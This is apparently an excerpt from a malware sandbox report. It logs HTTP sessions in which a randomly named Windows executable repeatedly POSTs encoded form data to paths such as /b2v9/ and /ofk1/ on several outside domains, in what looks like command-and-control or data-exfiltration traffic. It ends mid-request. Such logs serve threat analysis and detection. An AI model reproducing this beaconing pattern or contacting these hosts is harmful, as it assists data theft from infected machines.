                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 35 75 6d 6f 43 2b 37 6c 78 75 34 77 6f 75 30 46 52 4d 31 77 37 32 2b 72 32 6b 34 50 70 38 6f 68 46 58 56 65 4a 79 65 52 64 51 66 44 76 49 65 46 43 53 4e 54 67 78 35 48 55 4c 51 2b 6c 77 36 78 5a 47 78 72 48 35 51 4b 70 53 66 63 38 33 67 43 35 6c 31 66 6e 4a 4c 33 45 41 4c 4f 44 39 63 47 43 47 6b 58 30 44 48 64 51 4b 50 52 4d 55 35 4a 37 55 49 63 56 56 58 53 68 32 34 4d 66 47 48 68 5a 72 6e 47 7a 59 63 2b 34 79 70 66 34 31 76 49 63 64 75 33 62 78 4f 31 78 50 6e 51 57 64 58 5a 32 54 2b 30 5a 68 52 56 2b 65 49 56 6e 6d 74 52 71 2f 4f 4d 6e 4b 57 34 38 75 36 4c 6b 70 50 4b 69 35 41 42 48 2b 6f 64 72 45 48 6e
                                                          Data Ascii: GBbljTO=5umoC+7lxu4wou0FRM1w72+r2k4Pp8ohFXVeJyeRdQfDvIeFCSNTgx5HULQ+lw6xZGxrH5QKpSfc83gC5l1fnJL3EALOD9cGCGkX0DHdQKPRMU5J7UIcVVXSh24MfGHhZrnGzYc+4ypf41vIcdu3bxO1xPnQWdXZ2T+0ZhRV+eIVnmtRq/OMnKW48u6LkpPKi5ABH+odrEHn
                                                          Jul 2, 2024 14:04:26.444986105 CEST135INHTTP/1.1 405 Not Allowed
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:26 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.64974515.197.142.17380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:28.488751888 CEST776OUTPOST /b2v9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.autonomyai.xyz
                                                          Origin: http://www.autonomyai.xyz
                                                          Referer: http://www.autonomyai.xyz/b2v9/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 35 75 6d 6f 43 2b 37 6c 78 75 34 77 6f 4e 38 46 43 37 5a 77 39 57 2b 6f 35 45 34 50 79 73 70 71 46 58 5a 65 4a 32 4f 42 64 6c 50 44 76 74 36 46 42 54 4e 54 6c 78 35 48 4e 37 51 37 71 51 36 32 5a 47 38 59 48 34 38 4b 70 53 4c 63 38 32 51 43 35 55 31 63 6e 5a 4c 35 4a 67 4c 4d 4e 64 63 47 43 47 6b 58 30 44 53 34 51 4b 48 52 4d 6c 4a 4a 34 31 49 62 4c 6c 58 52 6f 57 34 4d 62 47 48 6c 5a 72 6d 68 7a 5a 51 55 34 77 68 66 34 33 48 49 63 50 47 34 56 78 50 38 38 76 6d 46 52 50 36 67 36 53 76 43 53 58 42 35 39 65 45 46 6d 51 73 4c 32 4d 4f 76 31 61 32 36 38 73 69 35 6b 4a 50 67 67 35 34 42 56 70 6b 36 6b 77 69 45 57 72 6e 59 52 55 72 6c 55 4a 52 6b 71 6b 68 57 78 6f 70 61 78 41 3d 3d
                                                          Data Ascii: GBbljTO=5umoC+7lxu4woN8FC7Zw9W+o5E4PyspqFXZeJ2OBdlPDvt6FBTNTlx5HN7Q7qQ62ZG8YH48KpSLc82QC5U1cnZL5JgLMNdcGCGkX0DS4QKHRMlJJ41IbLlXRoW4MbGHlZrmhzZQU4whf43HIcPG4VxP88vmFRP6g6SvCSXB59eEFmQsL2MOv1a268si5kJPgg54BVpk6kwiEWrnYRUrlUJRkqkhWxopaxA==
                                                          Jul 2, 2024 14:04:28.960928917 CEST135INHTTP/1.1 405 Not Allowed
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:28 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.64974615.197.142.17380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:31.029099941 CEST1789OUTPOST /b2v9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.autonomyai.xyz
                                                          Origin: http://www.autonomyai.xyz
                                                          Referer: http://www.autonomyai.xyz/b2v9/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 35 75 6d 6f 43 2b 37 6c 78 75 34 77 6f 4e 38 46 43 37 5a 77 39 57 2b 6f 35 45 34 50 79 73 70 71 46 58 5a 65 4a 32 4f 42 64 6d 76 44 76 66 79 46 42 77 6c 54 6d 78 35 48 46 62 51 36 71 51 36 6e 5a 47 30 48 48 34 68 39 70 51 7a 63 75 45 6f 43 77 48 74 63 73 5a 4c 35 56 51 4c 4a 44 39 63 70 43 48 55 54 30 44 43 34 51 4b 48 52 4d 6d 52 4a 73 55 49 62 4a 6c 58 53 68 32 34 41 66 47 48 64 5a 71 4f 62 7a 5a 45 75 34 41 42 66 35 58 33 49 65 37 6d 34 5a 78 50 2b 2f 76 6e 47 52 50 32 42 36 53 7a 2f 53 58 64 54 39 5a 4d 46 6b 46 78 58 76 64 4f 76 72 59 2b 2f 67 62 6d 4e 67 4a 62 6b 70 62 38 39 47 6f 6b 6c 69 69 61 57 57 4e 54 37 54 45 65 36 66 34 4a 31 73 78 34 58 79 59 6f 33 73 57 69 47 2b 6d 32 4c 41 6b 6e 30 72 4e 74 56 67 56 53 6b 54 4a 37 51 4e 6a 62 2f 35 43 31 4c 72 42 47 71 4c 4c 35 66 38 6a 63 33 5a 47 49 55 72 53 50 2f 62 6d 36 73 72 36 5a 2f 6a 43 66 74 6a 4b 36 47 55 4b 46 57 68 6d 57 50 67 35 79 4c 74 51 4a 54 57 39 38 59 4c 36 75 4f 54 45 33 66 37 71 44 37 6d 2b 65 44 56 75 [TRUNCATED]
                                                          Data Ascii: GBbljTO=5umoC+7lxu4woN8FC7Zw9W+o5E4PyspqFXZeJ2OBdmvDvfyFBwlTmx5HFbQ6qQ6nZG0HH4h9pQzcuEoCwHtcsZL5VQLJD9cpCHUT0DC4QKHRMmRJsUIbJlXSh24AfGHdZqObzZEu4ABf5X3Ie7m4ZxP+/vnGRP2B6Sz/SXdT9ZMFkFxXvdOvrY+/gbmNgJbkpb89GokliiaWWNT7TEe6f4J1sx4XyYo3sWiG+m2LAkn0rNtVgVSkTJ7QNjb/5C1LrBGqLL5f8jc3ZGIUrSP/bm6sr6Z/jCftjK6GUKFWhmWPg5yLtQJTW98YL6uOTE3f7qD7m+eDVuLTc8xV1T26eaYhNQxfpugv0Ehae/HWoBggo9IBde3HzISNxwSy687XAy4MOFsIJLeKdr4yWkZvY7k0SpyQUmjU4U0S4cApmsUhn5fpySEqs+ea6uzRVBdbxfR6hW7ReHsYEtvXTzTwWiE8V3RpQDqYflg6vGVT9hWhQYODST/sF/taeZ7WuUl2ygPThBiWlDXc5GcgLxB/4lRm5Xdec2b6JRJggX5MvUWXs7NUi62lry+FRXiikQTRClmeFICH1ASTKbVNPzdfp2YB8+jKmQxld+WMti8UNV8q/4Gn9+qhWg1QTtynMZTMNMR0UBQvkS9GdgF8mVWFmiHrAR95Is+lzkVx4JJJG8EUiDvOMF/90uXMKT65H0dQgnO+V7fRZsPOx3di1NoijhG1tq4wRw30+zDZo1nWAKWKntVy1uZrMYMBWfYOzhgs6FsAbFfEuEYSsxdnaGchUYO4jVxs4qT0sHV7lmmMRdhOIQ80eBJqdHSy26cXN1wcR2FD7Nuze9y7A+mKTPsNtTWbjT5WPQOgzBx6PiB3hrWdwRpUyxwOiRrtd+GtkyFsWTqEj0sKMHFaAg7JW9Myfp2A8uMVPEE6oUT8AaljkNc12nwDUh2bT2jnnRhSLxpPlF3qcNPKq6KIR7vzlSd+GXbhA8k0UrkHqd1StrPcBiRo [TRUNCATED]
                                                          Jul 2, 2024 14:04:31.503010988 CEST135INHTTP/1.1 405 Not Allowed
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:31 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.64974715.197.142.17380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:33.563081026 CEST484OUTGET /b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.autonomyai.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:04:34.054696083 CEST133INHTTP/1.1 404 Not Found
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:34 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.649748108.186.253.4980280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:40.429023981 CEST749OUTPOST /ofk1/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.faxinguxn6.cn
                                                          Origin: http://www.faxinguxn6.cn
                                                          Referer: http://www.faxinguxn6.cn/ofk1/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4d 6a 69 4b 47 51 62 6f 55 4e 39 66 4c 76 72 4b 50 4c 53 51 75 42 75 55 41 58 47 78 4d 74 68 39 6b 70 4f 47 61 2b 71 65 52 42 36 41 71 33 4e 52 6f 55 50 71 61 36 56 2b 30 77 46 39 34 30 32 42 50 54 70 7a 44 63 45 62 35 32 70 6a 61 79 6b 30 30 34 44 78 50 48 72 50 6d 53 64 44 66 62 71 39 4c 47 6a 44 54 79 6b 69 5a 37 79 30 51 41 48 34 71 44 41 52 53 55 52 57 64 6f 67 56 2b 5a 72 31 44 34 39 44 36 7a 70 51 31 46 77 72 39 64 44 51 78 6a 6e 54 61 68 53 68 62 70 79 46 48 36 42 62 69 48 38 65 2b 67 72 77 4d 72 78 53 44 4c 53 4a 6c 6e 78 51 46 39 5a 72 46 6b 49 62 4b 4b 78 47 2f 34 54 63 52 30 48 43 46 6d 4c 4c
                                                          Data Ascii: GBbljTO=MjiKGQboUN9fLvrKPLSQuBuUAXGxMth9kpOGa+qeRB6Aq3NRoUPqa6V+0wF9402BPTpzDcEb52pjayk004DxPHrPmSdDfbq9LGjDTykiZ7y0QAH4qDARSURWdogV+Zr1D49D6zpQ1Fwr9dDQxjnTahShbpyFH6BbiH8e+grwMrxSDLSJlnxQF9ZrFkIbKKxG/4TcR0HCFmLL
                                                          Jul 2, 2024 14:04:41.023118019 CEST146INHTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:37 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.649749108.186.253.4980280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:43.015467882 CEST773OUTPOST /ofk1/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.faxinguxn6.cn
                                                          Origin: http://www.faxinguxn6.cn
                                                          Referer: http://www.faxinguxn6.cn/ofk1/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4d 6a 69 4b 47 51 62 6f 55 4e 39 66 4a 50 37 4b 44 4b 53 51 37 78 75 58 50 33 47 78 61 64 68 35 6b 70 79 47 61 2f 2b 4f 51 7a 4f 41 72 57 39 52 36 47 72 71 57 61 56 2b 74 41 46 34 33 55 32 61 50 54 6c 42 44 5a 38 62 35 79 42 6a 61 79 30 30 30 4c 37 77 50 58 72 42 36 53 64 37 42 72 71 39 4c 47 6a 44 54 32 31 46 5a 37 71 30 51 78 33 34 34 32 67 53 62 30 52 56 55 49 67 56 36 5a 72 75 44 34 39 62 36 77 74 32 31 48 34 72 39 59 48 51 2f 52 44 4d 4e 52 53 72 46 70 79 62 4b 50 34 71 6c 58 39 41 35 67 6e 6f 52 6f 39 32 4c 64 54 54 35 55 78 7a 58 74 35 70 46 6d 51 70 4b 71 78 73 39 34 72 63 44 6a 4c 6c 4b 53 75 6f 33 38 73 36 56 2f 35 58 51 59 56 6d 64 53 63 32 33 6a 4a 72 78 67 3d 3d
                                                          Data Ascii: GBbljTO=MjiKGQboUN9fJP7KDKSQ7xuXP3Gxadh5kpyGa/+OQzOArW9R6GrqWaV+tAF43U2aPTlBDZ8b5yBjay000L7wPXrB6Sd7Brq9LGjDT21FZ7q0Qx3442gSb0RVUIgV6ZruD49b6wt21H4r9YHQ/RDMNRSrFpybKP4qlX9A5gnoRo92LdTT5UxzXt5pFmQpKqxs94rcDjLlKSuo38s6V/5XQYVmdSc23jJrxg==
                                                          Jul 2, 2024 14:04:43.604095936 CEST146INHTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:41 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.649750108.186.253.4980280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:45.551078081 CEST1786OUTPOST /ofk1/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.faxinguxn6.cn
                                                          Origin: http://www.faxinguxn6.cn
                                                          Referer: http://www.faxinguxn6.cn/ofk1/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4d 6a 69 4b 47 51 62 6f 55 4e 39 66 4a 50 37 4b 44 4b 53 51 37 78 75 58 50 33 47 78 61 64 68 35 6b 70 79 47 61 2f 2b 4f 51 7a 32 41 72 67 4a 52 6f 32 58 71 56 61 56 2b 79 77 46 44 33 55 32 62 50 54 74 2f 44 5a 34 6c 35 77 4a 6a 56 78 73 30 6a 4b 37 77 57 6e 72 42 78 79 64 41 66 62 72 67 4c 46 4c 48 54 79 70 46 5a 37 71 30 51 7a 76 34 36 6a 41 53 58 55 52 57 64 6f 67 52 2b 5a 71 67 44 35 56 4c 36 7a 42 41 31 33 59 72 39 34 33 51 39 69 6e 4d 50 78 53 74 41 70 7a 49 4b 50 38 78 6c 58 68 79 35 68 6a 57 52 71 68 32 42 63 71 35 6f 57 6c 79 4c 50 78 71 55 48 34 57 4f 2b 31 37 79 72 50 6e 48 51 75 51 47 6d 6d 6e 75 73 31 68 56 65 63 74 64 62 35 49 5a 6e 63 67 78 54 41 36 6a 4d 69 38 65 42 48 4e 41 5a 49 69 53 52 61 77 38 5a 4e 2b 41 4f 34 4d 57 71 63 6b 77 31 6b 58 73 79 4c 31 7a 4b 4f 34 33 30 51 4f 48 57 37 4d 33 58 69 53 6a 6a 2b 43 57 42 37 61 38 6d 32 63 70 7a 4a 30 71 59 4d 69 77 30 6f 32 6e 76 53 37 62 6d 30 76 78 73 30 73 41 46 63 34 49 30 56 53 4f 45 33 31 4b 35 6b 37 4d 48 [TRUNCATED]
                                                          Data Ascii: GBbljTO=MjiKGQboUN9fJP7KDKSQ7xuXP3Gxadh5kpyGa/+OQz2ArgJRo2XqVaV+ywFD3U2bPTt/DZ4l5wJjVxs0jK7wWnrBxydAfbrgLFLHTypFZ7q0Qzv46jASXURWdogR+ZqgD5VL6zBA13Yr943Q9inMPxStApzIKP8xlXhy5hjWRqh2Bcq5oWlyLPxqUH4WO+17yrPnHQuQGmmnus1hVectdb5IZncgxTA6jMi8eBHNAZIiSRaw8ZN+AO4MWqckw1kXsyL1zKO430QOHW7M3XiSjj+CWB7a8m2cpzJ0qYMiw0o2nvS7bm0vxs0sAFc4I0VSOE31K5k7MHKh4cIorejLieQHopDph9XX55l7x+qkvohbReQ/rb+8fPOLUaB1O6+z0ICXgNtyPF1E8DG6vHuYp1eTfYFkE7YOxMPYhzB3wzTg97Q5T/z/8x8c13BuxweMNDCO3OVH7YWk6krLD940wIrUjAIpX3Zuen6K4vGNlLNJ6qugaXL/5NdgXM/ho2+4JrbTLz74018qZ51H4In321sP/Gpz3+bElD3+0R+nSarfclLW6S8APamC0gP8c5IgOcWCFPt/1wzaFjoFEpVujnlhH/7NuWr0FlXKkqSMtK8+/m0mdxkTFQ8IUjNEguJx6KxJHP15LCYyIRcgxUcY9L//NhuA4oaYaEj0mDQdIXN6LnxD6NtFQ71WW/7p25ygfG68Kv765h6MDEJmI4D6i2a9TFN7sob0cdJgICvDSGG7kHuo3FwP0BspdcN2rbxAhywPgzapCGOaO2eeFwCMzDMo55wNgVZgLSeG4HGgRurpckoDCgZwYS8vIUDC/BnokrOqizcnFk0kyCleeC30H0dKzR49PaoT8AcAFIL2vel2dc5g2HCyZunpJ4sA6zlclCA087MDdvmOz11FGj7vwkqNXk8XC0epNXMkVMVCQoU+noP28arDzUlw0njwU0Qais1p+DC1gpRUnG9gxYs1Zg9SWYVJAssm2qS8T6v7I/Fh [TRUNCATED]
                                                          Jul 2, 2024 14:04:46.147147894 CEST146INHTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:43 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.649751108.186.253.4980280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:48.099148989 CEST483OUTGET /ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.faxinguxn6.cn
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:04:48.686291933 CEST146INHTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:46 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.6497523.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:53.723051071 CEST749OUTPOST /4ez3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.hereboy.co.uk
                                                          Origin: http://www.hereboy.co.uk
                                                          Referer: http://www.hereboy.co.uk/4ez3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 72 64 77 73 76 6b 45 79 59 67 39 6a 42 2b 76 36 65 4f 4b 6f 72 52 4d 4b 43 33 43 74 6e 6a 54 42 70 78 66 41 30 72 57 61 61 59 37 4b 51 73 52 4f 69 2b 42 73 75 34 6d 73 6d 6c 45 76 34 33 49 6e 43 33 67 71 2b 59 70 41 47 76 44 53 4b 48 30 37 61 59 56 54 6b 46 33 32 4f 63 4b 45 30 56 61 44 65 66 53 4c 4f 32 67 4e 6f 50 6d 78 6c 35 6a 69 50 56 65 32 75 77 79 66 6b 6d 51 39 6f 74 2b 4f 32 63 79 73 58 30 65 4c 50 47 46 43 74 34 6e 77 61 37 62 2f 75 49 36 70 43 7a 63 31 7a 65 51 66 79 34 4b 6f 4c 74 74 58 71 4d 33 79 2f 4b 56 74 32 71 70 46 38 2f 6f 43 4e 67 7a 77 66 6e 42 75 48 39 73 77 59 67 51 67 63 74 77 63
                                                          Data Ascii: GBbljTO=rdwsvkEyYg9jB+v6eOKorRMKC3CtnjTBpxfA0rWaaY7KQsROi+Bsu4msmlEv43InC3gq+YpAGvDSKH07aYVTkF32OcKE0VaDefSLO2gNoPmxl5jiPVe2uwyfkmQ9ot+O2cysX0eLPGFCt4nwa7b/uI6pCzc1zeQfy4KoLttXqM3y/KVt2qpF8/oCNgzwfnBuH9swYgQgctwc


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.6497533.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:56.265100002 CEST773OUTPOST /4ez3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.hereboy.co.uk
                                                          Origin: http://www.hereboy.co.uk
                                                          Referer: http://www.hereboy.co.uk/4ez3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 72 64 77 73 76 6b 45 79 59 67 39 6a 54 50 66 36 63 70 57 6f 37 42 4d 56 4d 58 43 74 70 44 54 4e 70 78 54 41 30 70 36 4b 61 74 6a 4b 54 4a 31 4f 6a 2f 42 73 76 34 6d 73 79 31 45 71 38 33 49 73 43 33 6b 59 2b 64 52 41 47 76 58 53 4b 46 73 37 61 4c 39 55 6c 56 33 77 56 73 4b 47 70 46 61 44 65 66 53 4c 4f 32 6c 61 6f 50 2b 78 6c 6f 54 69 4a 33 32 31 78 41 79 63 74 47 51 39 6c 4e 2b 53 32 63 79 30 58 33 61 31 50 45 74 43 74 39 62 77 62 70 6a 38 31 34 36 77 47 7a 64 52 2b 75 64 6d 6f 65 62 5a 48 2f 5a 6c 33 2f 2f 59 36 38 55 33 71 5a 70 6d 75 76 49 41 4e 69 72 43 66 48 42 45 46 39 55 77 4b 33 63 48 54 5a 56 2f 72 31 43 62 6a 4a 51 46 30 39 6c 7a 72 6a 63 2b 6c 4d 4e 69 50 67 3d 3d
                                                          Data Ascii: GBbljTO=rdwsvkEyYg9jTPf6cpWo7BMVMXCtpDTNpxTA0p6KatjKTJ1Oj/Bsv4msy1Eq83IsC3kY+dRAGvXSKFs7aL9UlV3wVsKGpFaDefSLO2laoP+xloTiJ321xAyctGQ9lN+S2cy0X3a1PEtCt9bwbpj8146wGzdR+udmoebZH/Zl3//Y68U3qZpmuvIANirCfHBEF9UwK3cHTZV/r1CbjJQF09lzrjc+lMNiPg==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.6497543.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:58.828634977 CEST1786OUTPOST /4ez3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.hereboy.co.uk
                                                          Origin: http://www.hereboy.co.uk
                                                          Referer: http://www.hereboy.co.uk/4ez3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
